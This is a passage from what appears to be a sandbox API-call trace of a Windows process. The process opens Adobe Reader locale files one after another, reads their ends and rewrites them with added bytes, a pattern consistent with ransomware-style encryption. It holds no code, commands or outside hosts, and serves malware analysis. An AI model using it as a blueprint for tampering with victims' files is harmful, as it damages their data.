10.0\\Reader\\Locale\\ja_JP\\SendMail.JPN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\sendmail.jpn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.923] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.923] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3200 [0076.923] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.923] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.923] ReleaseMutex (hMutex=0x168) returned 1 [0076.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.JPN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.923] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.JPN", cchWideChar=12, lpMultiByteStr=0x1f732cc, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.JPN", lpUsedDefaultChar=0x0) returned 12 [0076.923] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.943] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2200 [0076.943] ReadFile (in: hFile=0x1ec, lpBuffer=0x2669898, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2669898*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0076.944] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2200 [0076.944] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0076.944] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0076.944] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0076.945] CloseHandle (hObject=0x1ec) returned 1 [0076.945] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\AdobeCollabSync.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\adobecollabsync.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.946] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.946] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0076.946] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.946] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.947] ReleaseMutex (hMutex=0x168) returned 1 [0076.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.KOR", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0076.947] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.KOR", cchWideChar=19, lpMultiByteStr=0x1f88bcc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.KOR", lpUsedDefaultChar=0x0) returned 19 [0076.947] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0076.949] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0076.949] WriteFile (in: hFile=0x1ec, lpBuffer=0x2667868*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2667868*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0076.950] CloseHandle (hObject=0x1ec) returned 1 [0076.950] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\IA32.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\ia32.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0076.951] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.951] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xc00 [0076.951] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0076.951] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0076.952] ReleaseMutex (hMutex=0x168) returned 1 [0076.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.KOR", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0076.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.KOR", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.KOR", lpUsedDefaultChar=0x0) returned 8 [0076.952] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e948a8, nNumberOfBytesToRead=0xc00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e948a8*, lpNumberOfBytesRead=0x311f2bc*=0xc00, lpOverlapped=0x0) returned 1 [0077.348] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0077.348] WriteFile (in: hFile=0x1ec, lpBuffer=0x2864a58*, nNumberOfBytesToWrite=0x1188, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesWritten=0x311f2d0*=0x1188, lpOverlapped=0x0) returned 1 [0077.348] CloseHandle (hObject=0x1ec) returned 1 [0077.349] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\SaveAsRTF.KOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\saveasrtf.kor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0077.349] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.349] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x3800 [0077.349] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.350] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.350] ReleaseMutex (hMutex=0x168) returned 1 [0077.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.KOR", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0077.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.KOR", cchWideChar=13, lpMultiByteStr=0x1f733cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.KOR", lpUsedDefaultChar=0x0) returned 13 [0077.350] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.355] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2800 [0077.355] ReadFile (in: hFile=0x1ec, lpBuffer=0x2695c18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2695c18*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.361] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x2800 [0077.362] WriteFile (in: hFile=0x1ec, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.362] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0077.362] WriteFile (in: hFile=0x1ec, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.362] CloseHandle (hObject=0x1ec) returned 1 [0077.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\accessibility.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\accessibility.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0077.363] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.364] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa400 [0077.364] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.364] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.364] ReleaseMutex (hMutex=0x168) returned 1 [0077.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.NOR", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.364] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.NOR", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.NOR", lpUsedDefaultChar=0x0) returned 17 [0077.364] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0077.366] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9400 [0077.366] ReadFile (in: hFile=0x1ec, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.367] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x9400 [0077.368] WriteFile (in: hFile=0x1ec, lpBuffer=0x2872fb8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872fb8*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.368] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0077.368] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0077.368] CloseHandle (hObject=0x1ec) returned 1 [0077.369] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\eBook.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\ebook.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0077.369] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.369] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1a00 [0077.370] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.370] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.370] ReleaseMutex (hMutex=0x168) returned 1 [0077.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.NOR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0077.370] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.NOR", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.NOR", lpUsedDefaultChar=0x0) returned 9 [0077.370] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x311f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0077.374] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0077.374] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x311f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0077.374] CloseHandle (hObject=0x1ec) returned 1 [0077.375] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\ReadOutLoud.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\readoutloud.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0077.375] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.376] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2a00 [0077.376] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.376] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.376] ReleaseMutex (hMutex=0x168) returned 1 [0077.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.NOR", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.NOR", cchWideChar=15, lpMultiByteStr=0x1f7366c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.NOR", lpUsedDefaultChar=0x0) returned 15 [0077.377] ReadFile (in: hFile=0x1ec, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.379] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0077.379] ReadFile (in: hFile=0x1ec, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.380] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1a00 [0077.381] WriteFile (in: hFile=0x1ec, lpBuffer=0x2669998*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2669998*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.381] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0077.381] WriteFile (in: hFile=0x1ec, lpBuffer=0x2695c18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695c18*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.381] CloseHandle (hObject=0x1ec) returned 1 [0077.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\updater.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\updater.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0077.382] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.383] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2800 [0077.383] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.383] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.383] ReleaseMutex (hMutex=0x168) returned 1 [0077.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.NOR", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0077.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.NOR", cchWideChar=11, lpMultiByteStr=0x1f7362c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.NOR", lpUsedDefaultChar=0x0) returned 11 [0077.384] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.386] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1800 [0077.386] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0077.387] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x1800 [0077.387] WriteFile (in: hFile=0x1ec, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0077.387] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0077.387] WriteFile (in: hFile=0x1ec, lpBuffer=0x2695c18*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2695c18*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0077.388] CloseHandle (hObject=0x1ec) returned 1 [0077.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\DigSig.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\digsig.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0077.388] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.389] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x21400 [0077.389] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0077.389] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0077.389] ReleaseMutex (hMutex=0x168) returned 1 [0078.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.NLD", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0078.027] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.NLD", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.NLD", lpUsedDefaultChar=0x0) returned 10 [0078.028] ReadFile (in: hFile=0x1ec, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0078.049] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: 